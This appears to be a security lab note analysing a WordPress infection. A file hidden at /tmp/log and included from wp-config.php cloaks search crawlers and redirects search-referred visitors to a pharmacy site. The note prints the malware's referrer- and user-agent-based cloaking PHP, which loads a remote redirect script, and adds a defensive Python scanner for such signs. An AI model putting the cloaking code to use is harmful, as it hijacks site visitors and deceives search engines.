Conditional redirection to an online pharmacy store

Labs Note

During an investigation, a client reported some weird behavior: every incoming visit that arrived from a click on one of their Google search results was instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware caused all incoming visits from Google.com searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php, into which a PHP include function had been added to pull in that log file.

Here is the conditional redirection rule snippet from the /tmp/log file.

```php
// ...
if ($content = $client->getContent()) {
    // Crawlers (user agent containing "google" or "bot") get the fetched
    // content itself, so the search engines index the doorway pages.
    if ((strpos($_SERVER['HTTP_USER_AGENT'], 'google') !== false)
        || (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false)) {
        echo $content;
        die;
    // Human visitors arriving from a Google or Bing search get the
    // redirecting script instead (except on the front page).
    } elseif ((strpos($_SERVER['HTTP_REFERER'], 'google') !== false)
        || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false)) {
        if ($_SERVER['REQUEST_URI'] != '/') {
            ?><script src="hxxp://scipton(.)com/doorways/default/script/script4.js"></script><?php
            die;
        }
    }
}
// ...
```

As you can see, the malicious code checks whether the referrer is set to Google or Bing and, if so, serves the malicious JavaScript that redirects the visitor to the hxxxs://pharm-bay(.)com pharmacy store. Requests whose user agent contains "google" or "bot" instead receive the fetched content directly, which keeps the redirect hidden from the crawlers that index the site.
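Two of the indicators in this note lend themselves to a simple static check: an include in wp-config.php that is not the stock wp-settings.php line, and PHP output that depends on a search-engine string in the referrer or user agent. The following scanner is an added example written for this note, not code from the original post or from the malware; the sample files it scans are constructed to mirror the infection described above.

```python
import re

# Signals taken from the infection described in this note.
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*;", re.I)
SERVER_KEY_RE = re.compile(
    r"\$_SERVER\s*\[\s*['\"]?(?:HTTP_REFERER|HTTP_USER_AGENT)['\"]?\s*\]", re.I)
ENGINE_RE = re.compile(r"['\"](?:google|bing|bot)['\"]", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=", re.I)


def scan_php(source: str, is_wp_config: bool = False) -> list[str]:
    """Return human-readable findings for one PHP source string."""
    findings = []
    if is_wp_config:
        # A stock wp-config.php only ever includes wp-settings.php.
        for m in INCLUDE_RE.finditer(source):
            if "wp-settings.php" not in m.group(0):
                findings.append("non-standard include in wp-config.php: "
                                + m.group(0).strip())
    if SERVER_KEY_RE.search(source) and ENGINE_RE.search(source):
        findings.append("output conditional on search-engine referrer/user-agent")
        if SCRIPT_SRC_RE.search(source):
            findings.append("external <script src> present in the same file")
    return findings


# Constructed sample: a wp-config.php with the kind of loader line described.
WP_CONFIG_SAMPLE = """<?php
define('DB_NAME', 'wp');
include(dirname(__FILE__) . '/tmp/log');
require_once(ABSPATH . 'wp-settings.php');
"""

# Constructed sample: a trimmed cloaking payload (placeholder script URL).
PAYLOAD_SAMPLE = """<?php
if ((strpos($_SERVER['HTTP_REFERER'], 'google') !== false)
    || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false)) {
    ?><script src="hxxp://placeholder.invalid/script.js"></script><?php die;
}
"""

# Constructed sample: ordinary request handling that should not be flagged.
BENIGN_SAMPLE = """<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') { echo 'ok'; }
"""

if __name__ == "__main__":
    for name, src, cfg in [("wp-config.php", WP_CONFIG_SAMPLE, True),
                           ("tmp/log", PAYLOAD_SAMPLE, False),
                           ("benign.php", BENIGN_SAMPLE, False)]:
        print(name, scan_php(src, is_wp_config=cfg))
```

Run it over a real install by reading each PHP file into `scan_php`; a hit on wp-config.php is worth checking by hand, since the included target may be extensionless and outside the usual web paths.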

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.
